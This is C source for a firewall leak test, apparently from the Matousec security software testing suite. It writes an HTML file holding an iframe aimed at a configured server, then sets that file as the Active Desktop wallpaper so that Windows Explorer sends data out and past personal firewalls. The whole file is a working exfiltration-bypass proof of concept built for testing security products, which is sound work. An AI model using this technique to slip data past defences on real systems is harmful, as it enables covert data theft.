/*

 Security Software Testing Suite - Breakout2 (leak-test)
 Copyright by www.matousec.com, Different Internet Experience Ltd.
 http://www.matousec.com/


 Credits:

   * The original idea by Volker Birk, http://www.dingens.org/.


 Method description:

   * Create a .html file which contains an iframe tag that should download the data.

   * Create an instance of IActiveDesktop.

   * Use the SetWallpaper and ApplyChanges methods of IActiveDesktop in order to set
     the .html file as the wallpaper of the desktop.

   * When Windows Explorer notices the changes it tries to display contents of the .html
     as a webpage on the desktop's background and that causes sending the data to
     the Internet server and downloading the response.


 Known issues and warnings:

   * Using this test may replace your desktop background.

*/


#include <windows.h>
#include <wininet.h>
#include <stdio.h>
#include "include/common.h"
#include "include/common-leak.h"
#include "include/common-hook.h"
#include "include/activedesktop.hpp"


int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
{
  COM_CONF conf;
  if (!com_console_init_winmain("Breakout2","breakout2",lpCmdLine,&conf,COM_TEST_TYPE_BREAKOUT2)) return 1;

  char *used_dlls[]={"advapi32.dll","ole32.dll","oleaut32.dll"};
  if (!com_hook_load_libraries(used_dlls,3)) return 1;

  DeleteUrlCacheEntry(conf.uri);

  int res=FALSE;

  COM_ERROR err_inf;
  err_inf.occurred=FALSE;

  char wallpaper_path[MAX_PATH];
  if (com_get_module_path(NULL,wallpaper_path,sizeof(wallpaper_path),&err_inf))
  {
    wchar_t wallpaper_pathw[MAX_PATH];
    snwprintf(wallpaper_pathw,sizeof(wallpaper_pathw)/sizeof(wchar_t),L"%S\\desktop.html",wallpaper_path);
    wallpaper_pathw[sizeof(wallpaper_pathw)/sizeof(wchar_t)-1]=L'\0';

    int file_ready=FALSE;
    int file_delete=FALSE;
    HANDLE file=CreateFileW(wallpaper_pathw,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
    if (file!=INVALID_HANDLE_VALUE)
    {
      file_delete=TRUE;
      if (com_verbosity_get()) printf("File \"%S\" created.\n",wallpaper_pathw);

      char content[COM_INET_URI_MAX_LEN+256];
      snprintf(content,sizeof(content),"<html><head></head><body>\n<iframe src=\"%s\" width=\"100%%\" height=\"100%%\">\n</iframe></body></html>",conf.uri);
      content[sizeof(content)-1]='\0';

      size_t len=strlen(content);

      DWORD written=0;
      if (WriteFile(file,content,len,&written,NULL))
      {
        if (com_verbosity_get()) printf("The content, %ld bytes, has been written to the file \"%S\".\n",written,wallpaper_pathw);

        file_ready=TRUE;
      } else com_err_set(&err_inf,"Unable to write data to a file \"%S\".\n",wallpaper_pathw);

      CloseHandle(file);
    } else com_err_set(&err_inf,"Unable to create file \"%S\".\n",wallpaper_pathw);

    if (file_ready)
    {
      HRESULT hres=CoInitialize(NULL);
      if (SUCCEEDED(hres))
      {
        IActiveDesktop *ad;
        hres=CoCreateInstance(CLSID_ActiveDesktop,NULL,CLSCTX_INPROC_SERVER,IID_IActiveDesktop,(void**)&ad);
        if (SUCCEEDED(hres))
        {
          if (com_verbosity_get()) printf("The IActiveDesktop instance created.\n");

          hres=ad->SetWallpaper(wallpaper_pathw,0);
          if (SUCCEEDED(hres))
          {
            if (com_verbosity_get()) printf("The wallpaper has been set.\n");

            hres=ad->ApplyChanges(AD_APPLY_ALL);
            if (SUCCEEDED(hres))
            {
              if (com_verbosity_get()) printf("The changes have been applied.\n\n");

              char buffer[4096];
              res=com_attempt_check_ie_cache(buffer,sizeof(buffer),&conf,10000,&err_inf)
               && com_find_pattern_and_print_data(buffer,sizeof(buffer),&conf,&err_inf);
            } else com_err_set_sc(&err_inf,HRESULT_CODE(hres),"Unable to apply changes made in the desktop configuration.\n");
          } else com_err_set_sc(&err_inf,HRESULT_CODE(hres),"Unable to set the wallpaper.\n");

          ad->Release();
        } else com_err_set_sc(&err_inf,HRESULT_CODE(hres),"Unable to create an instance of IActiveDesktop.\n");

        CoUninitialize();
      } else com_err_set_sc(&err_inf,HRESULT_CODE(hres),"Unable to initialize COM.\n");
    }

    if (file_delete) DeleteFileW(wallpaper_pathw);
  }

  return com_end(res,&err_inf,&conf);
}
